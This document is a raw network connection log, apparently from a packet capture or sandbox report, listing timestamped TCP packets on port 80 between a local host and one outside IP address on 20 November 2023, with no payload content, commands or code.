Nov 20, 2023 05:21:13.726288080 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.726350069 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.727082014 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.727135897 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.727863073 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.727910042 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.727967978 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.728010893 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.730102062 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.730165005 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.762188911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.762204885 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.762293100 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.764753103 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.764811039 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.765577078 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.765625954 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.767690897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.767740011 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.768136978 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.768192053 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.769001961 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.769016027 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.769052029 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.771580935 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.771611929 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.771647930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.771676064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.772372961 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.772424936 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.772792101 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.772839069 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.774101973 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.774115086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.774153948 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.775305986 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.775361061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.775377035 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.775413990 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.776133060 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.776146889 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.776182890 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.777868986 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.777883053 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.777920008 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.778244019 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.778290033 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.779548883 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.779597998 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.780407906 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.780457020 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.780849934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.780896902 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.782526970 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.782579899 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.788599968 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.788656950 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.789412022 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.789463043 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.789846897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.789880991 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.789899111 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.789912939 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.799601078 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.799665928 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.800043106 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.800095081 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.805177927 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.805193901 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.805236101 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.806900978 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.806955099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.809092045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.809146881 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.812232971 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.812247992 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.812292099 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.814239025 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.814316988 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.814330101 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.814374924 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.815088987 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.815145016 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.817219019 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.817269087 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.818025112 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.818075895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.818897963 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.818948030 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.820580006 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.820597887 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.820626020 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.820643902 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.821008921 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.821062088 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.822742939 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.822796106 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.823415041 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.823466063 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.824793100 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.824807882 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.824841022 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.824878931 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.826033115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.826050043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.826098919 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.826879025 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.826929092 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.828658104 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.828715086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.829417944 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.829466105 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.832833052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.832848072 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.832885981 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.840390921 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.840405941 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.840444088 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.841669083 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.841682911 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.841717958 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.841741085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.842058897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.842081070 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.842106104 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.842118979 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.843394995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.843421936 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.843446970 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.843482018 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.843818903 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.843831062 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.843868971 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.845141888 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.845190048 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.845202923 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.845263004 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.845542908 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.845581055 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.845588923 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.845622063 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.846385956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.846430063 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.846436024 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.846473932 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.847276926 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.847291946 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.847330093 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.848099947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.848138094 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.848149061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.848180056 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.850354910 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.850418091 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.852078915 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.852130890 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.855168104 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.855187893 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.855225086 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.855238914 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.855509043 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.855525017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.855560064 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.855571985 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.857728004 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.857779026 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.866770983 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.866794109 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.866849899 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.868818045 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.868881941 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.871413946 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.871433020 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.871470928 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.871481895 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.873028994 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.873080969 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.877437115 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.877455950 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.877513885 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.879086971 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.879127979 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.879151106 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.879179001 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.881269932 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.881325006 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.882787943 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.882806063 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.882843018 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.882853985 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.886418104 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.886457920 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.886496067 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.886518955 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.890687943 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.890718937 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.890746117 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.890760899 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.896414995 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.896476984 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.898171902 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.898226976 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.899899960 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.899952888 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.901999950 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.902054071 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.905009985 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.905061007 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.905849934 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.905909061 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.906687021 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.906709909 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.906737089 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.906754017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.910290956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.910351992 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.915416956 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.915441036 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.915466070 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.915478945 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.920289993 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.920311928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.920339108 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.920355082 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.923820019 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.923866987 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.924200058 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.924221992 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.924248934 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.924262047 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.925113916 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.925163031 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.925976038 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.926019907 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.934844017 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.934868097 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.934900045 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.934919119 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.936950922 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.937000990 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.938214064 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.938257933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.938288927 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.938327074 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.939474106 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.939519882 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.939918041 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.939964056 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.943075895 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.943128109 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.949239016 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.949302912 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.952271938 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.952321053 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.957683086 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.957734108 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.966696978 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.966753006 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.970691919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.970716000 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.970746040 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.970765114 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.971085072 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.971106052 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.971127987 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.971146107 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.973777056 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.973798037 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.973828077 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.973844051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.982661009 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.982731104 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.983114958 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.983161926 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.983944893 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.983989000 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.990272999 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.990338087 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.991755009 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.991806030 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:13.993644953 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:13.993721008 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.002790928 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.002850056 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.003185034 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.003235102 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.006731987 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.006804943 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.013206005 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.013256073 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.014062881 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.014089108 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.014120102 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.014133930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.015774965 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.015827894 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.016161919 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.016207933 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.020571947 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.020618916 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.023227930 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.023292065 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.023646116 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.023684025 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.023700953 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.023727894 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.029382944 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.029452085 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.034032106 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.034070015 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.034087896 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.034120083 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.034889936 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.034954071 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.037017107 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.037086964 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.038809061 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.038835049 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.038858891 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.038882017 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.040791988 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.040812969 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.040841103 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.040854931 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.041193962 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.041245937 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.043939114 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.043989897 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.044003010 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.044033051 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.045120001 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.045160055 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.045172930 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.045197010 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.046919107 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.046967983 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.047257900 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.047303915 CET	49731	80	192.168.2.4	179.43.170.230
Nov 20, 2023 05:21:14.048115015 CET	80	49731	179.43.170.230	192.168.2.4
Nov 20, 2023 05:21:14.048132896 CET	80	49731	179.43.170.230	192.168.2.4
